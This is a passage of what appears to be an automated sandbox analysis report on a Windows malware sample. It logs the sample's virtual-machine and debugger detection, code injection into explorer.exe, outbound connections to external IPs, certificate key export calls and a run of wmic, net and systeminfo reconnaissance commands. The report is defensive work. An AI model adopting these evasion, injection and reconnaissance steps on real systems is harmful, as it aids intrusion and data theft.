    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid=&quot;{50dd5230-ba8a-11d1-bf5d-0000f805f530}&quot;
    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
    Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand
    Switches to a custom stack to bypass stack traces
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\jghruerAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\jghruerAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeAPI/Special instruction interceptor: Address: 7FFE2220D584
    Source: C:\Users\user\AppData\Roaming\hdhruerAPI/Special instruction interceptor: Address: 7FFE2220E814
    Source: C:\Users\user\AppData\Roaming\hdhruerAPI/Special instruction interceptor: Address: 7FFE2220D584
    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
    Source: hdhruer, 00000008.00000002.2573378504.000000000048E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOKS=KR
    Source: jghruer, 00000005.00000002.1976948606.000000000056E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK(?
    Source: ctMI3TYXpX.exe, 00000000.00000002.1726195283.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, 35DB.exe, 00000006.00000002.2327390421.000000000075E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401E65 rdtsc 6_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00141016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_00141016
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 371Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1321Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 674Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1898Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 883Jump to behavior
    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 868Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 3124
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2600
    Source: C:\Windows\SysWOW64\explorer.exeWindow / User API: threadDelayed 4547
    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 4440
    Source: C:\Users\user\AppData\Local\Temp\B972.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_9-4486
    Source: C:\Windows\explorer.exe TID: 7440Thread sleep count: 371 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7448Thread sleep count: 1321 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7448Thread sleep time: -132100s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 7444Thread sleep count: 674 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7444Thread sleep time: -67400s >= -30000sJump to behavior
    Source: C:\Windows\explorer.exe TID: 7792Thread sleep count: 286 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7800Thread sleep count: 266 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7796Thread sleep count: 287 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 8000Thread sleep count: 48 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7448Thread sleep count: 1898 > 30Jump to behavior
    Source: C:\Windows\explorer.exe TID: 7448Thread sleep time: -189800s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 5100Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6104Thread sleep count: 3124 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 6104Thread sleep time: -3124000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 5004Thread sleep count: 2600 > 30
    Source: C:\Windows\explorer.exe TID: 5004Thread sleep time: -2600000s >= -30000s
    Source: C:\Windows\SysWOW64\explorer.exe TID: 3264Thread sleep count: 4547 > 30
    Source: C:\Windows\SysWOW64\explorer.exe TID: 3264Thread sleep time: -4547000s >= -30000s
    Source: C:\Windows\explorer.exe TID: 2132Thread sleep count: 4440 > 30
    Source: C:\Windows\explorer.exe TID: 2132Thread sleep time: -4440000s >= -30000s
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem
    Source: C:\Users\user\AppData\Local\Temp\B972.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
    Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domain
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Windows\explorer.exeLast function: Thread delayed
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D6FB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,9_2_00007FF6F2D6FB38
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02752B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,13_2_02752B15
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02753ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,13_2_02753ED9
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02751D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,13_2_02751D4A
    Source: C:\Windows\explorer.exeCode function: 15_2_00CD30A8 FindFirstFileW,FindNextFileW,FindClose,15_2_00CD30A8
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 13_2_02756512 GetSystemInfo,13_2_02756512
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
    Source: explorer.exe, 00000001.00000000.1714740559.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
    Source: explorer.exe, 00000001.00000000.1714740559.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
    Source: explorer.exe, 00000001.00000000.1714740559.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
    Source: B972.exe, 00000009.00000002.4124068807.000002342E58C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
    Source: explorer.exe, 00000001.00000000.1712544792.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
    Source: B972.exe, 00000009.00000002.4124955821.000002342E63B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: lgroup & echo 3357828121311360313357828121\r\n\r\nAliases for \\\\user-PC\r\n\r\n-------------------------------------------------------------------------------\r\n*Access Control Assistance Operators\r\n*Administrators\r\n*Backup Operators\r\n*Cryptographic Operators\r\n*Device Owners\r\n*Distributed COM Users\r\n*Event Log Readers\r\n*Guests\r\n*Hyper-V Administrators\r\n*IIS_IUSRS\r\n*Network Configuration Operators\r\n*Performance Log Users\r\n*Performance Monitor Users\r\n*Power Users\r\n*Remote Desktop Users\r\n*Remote Management Users\r\n*Replicator\r\n*System Managed Accounts Group\r\n*Users\r\nThe command completed successfully.\r\n\r\n3357828121311360313357828121\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>\r\nC:\\Users\\user\\AppData\\Local\\Temp>
    Source: explorer.exe, 00000001.00000000.1714214709.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1714214709.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002D80000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.2750919806.0000000002DCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: B972.exe, 00000009.00000003.3467979736.000002342E5FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\n [02]: Intel64 Family 6 Model 143 Stepping 8 GenuineIntel ~2000 Mhz\r\nBIOS Version: TULH3 5DEYV, 21/11/2022\r\nWindows Directory: C:\\Windows\r\nSystem Directory: C:\\Windows\\system32\r\nBoot Device: \\Device\\HarddiskVolume1\r\nSystem Locale: en-gb;English (United Kingdom)\r\nInput Locale: de-ch;German (Switzerland)\r\nTime Zone: (UTC-05:00) Eastern Time (US & Canada)\r\nTotal Physical Memory: 4'095 MB\r\nAvailable Physical Memory: 2'850 MB\r\nVirtual Memory: Max Size: 8'191 MB\r\nVirtual Memory: Available: 7'113 MB\r\nVirtual Memory: In Use: 1'078 MB\r\nPage File Location(s): C:\\pagefile.sys\r\nDomain: UPf6A\r\nLogon Server: \\\\user-PC\r\nHotfix(s): N/A\r\nNetwork Card(s): 1 NIC(s) Installed.\r\n [01]: Intel(R) 82574L Gigabit Network Connection\r\n Connection Name: Ethernet0\r\n DHCP Enabled: No\r\n IP address(es)\r\n [01]: 192.168.2.4\r\n [02]: fe80::29b9:a951:1791:4eb3\r\nHyper-V Requirements: VM Monitor Mode Extensions: No\r\n Virtualization Enabled In Firmware: No\r\n Second Level Address Translation: No\r\n Data Execution Prevention Available: Yes\r\n2933921759311360312933921759\r\n\r\nC:\\Users\\user\\AppData\\Local\\Temp>uthority","subje
    Source: explorer.exe, 00000001.00000000.1714740559.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
    Source: explorer.exe, 00000001.00000000.1712544792.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
    Source: B972.exe, 00000009.00000003.3467979736.000002342E5FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
    Source: explorer.exe, 00000001.00000000.1714214709.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
    Source: ROUTE.EXE, 00000022.00000002.3112493340.0000022FEDB39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: explorer.exe, 00000001.00000000.1711147708.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSystem information queried: ModuleInformationJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeProcess information queried: ProcessInformationJump to behavior

    Anti Debugging

    barindex
    Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSystem information queried: CodeIntegrityInformationJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerProcess queried: DebugPortJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00401E65 rdtsc 6_2_00401E65
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00141B17 CloseHandle,RtlMoveMemory,LoadLibraryA,GetProcAddress,LdrProcessRelocationBlock,16_2_00141B17
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 16_2_00141016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,16_2_00141016
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D63220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,9_2_00007FF6F2D63220
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004B092B mov eax, dword ptr fs:[00000030h]0_2_004B092B
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_004B0D90 mov eax, dword ptr fs:[00000030h]0_2_004B0D90
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeCode function: 0_2_005031F6 push dword ptr fs:[00000030h]0_2_005031F6
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_0053092B mov eax, dword ptr fs:[00000030h]5_2_0053092B
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_00530D90 mov eax, dword ptr fs:[00000030h]5_2_00530D90
    Source: C:\Users\user\AppData\Roaming\jghruerCode function: 5_2_00592E16 push dword ptr fs:[00000030h]5_2_00592E16
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B092B mov eax, dword ptr fs:[00000030h]6_2_005B092B
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_005B0D90 mov eax, dword ptr fs:[00000030h]6_2_005B0D90
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeCode function: 6_2_00783242 push dword ptr fs:[00000030h]6_2_00783242
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_004B1C7A push dword ptr fs:[00000030h]8_2_004B1C7A
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_01FA0D90 mov eax, dword ptr fs:[00000030h]8_2_01FA0D90
    Source: C:\Users\user\AppData\Roaming\hdhruerCode function: 8_2_01FA092B mov eax, dword ptr fs:[00000030h]8_2_01FA092B
    Source: C:\Users\user\AppData\Local\Temp\B972.exeCode function: 9_2_00007FF6F2D625B4 GetProcessHeap,RtlFreeHeap,9_2_00007FF6F2D625B4

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Benign windows process drops PE files
    Source: C:\Windows\explorer.exeFile created: 35DB.exe.1.drJump to dropped file
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\explorer.exeNetwork Connect: 201.103.8.135 80Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeNetwork Connect: 23.145.40.168 443Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 180.75.11.133 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
    Creates a thread in another existing process (thread injection)
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeThread created: C:\Windows\explorer.exe EIP: 33C19A8Jump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerThread created: unknown EIP: 8C419A8Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeThread created: unknown EIP: 8801970Jump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerThread created: unknown EIP: 9071970Jump to behavior
    Injects code into the Windows Explorer (explorer.exe)
    Source: C:\Windows\explorer.exeMemory written: PID: 6796 base: 2379C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 7496 base: 7FF72B812D10 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 5804 base: 2379C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 7524 base: 7FF72B812D10 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 5088 base: 2379C0 value: 90Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: PID: 4092 base: 7FF72B812D10 value: 90Jump to behavior
    Maps a DLL or memory area into another process
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\Desktop\ctMI3TYXpX.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\jghruerSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\35DB.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
    Source: C:\Users\user\AppData\Roaming\hdhruerSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and readJump to behavior
    Writes to foreign memory regions
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2379C0Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2379C0Jump to behavior
    Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 2379C0Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeCode function: wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe19_2_02EF10A5
    Source: C:\Windows\SysWOW64\explorer.exeCode function: RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep, explorer.exe19_2_02EF1016
    Source: C:\Users\user\AppData\Local\Temp\B972.exeProcess created: C:\Windows\System32\cmd.exe cmdJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /format:csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /format:csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\SecurityCenter2 Path AntiSpywareProduct Get displayName /format:csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Processor Get Name,DeviceID,NumberOfCores /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Product Get Name,Version /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_NetworkAdapter Where PhysicalAdapter=TRUE Get Name,MACAddress,ProductName,ServiceName,NetConnectionID /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_StartupCommand Get Name,Location,Command /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_OperatingSystem Get Caption,CSDVersion,BuildNumber,Version,BuildType,CountryCode,CurrentTimeZone,InstallDate,LastBootUpTime,Locale,OSArchitecture,OSLanguage,OSProductSuite,OSType,SystemDirectory,Organization,RegisteredUser,SerialNumber /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Process Get Caption,CommandLine,ExecutablePath,ProcessId /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_Volume Get Name,Label,FileSystem,SerialNumber,BootVolume,Capacity,DriveType /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_UserAccount Get Name,Domain,AccountType,LocalAccount,Disabled,Status,SID /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_GroupUser Get GroupComponent,PartComponent /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_ComputerSystem Get Caption,Manufacturer,PrimaryOwnerName,UserName,Workgroup /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic /namespace:\\root\cimv2 Path Win32_PnPEntity Where ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}" Get Name,DeviceID,PNPDeviceID,Manufacturer,Description /format:csv Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /displaydnsJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /v /fo csvJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net accounts /domainJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net shareJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 accounts /domain
    Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 share
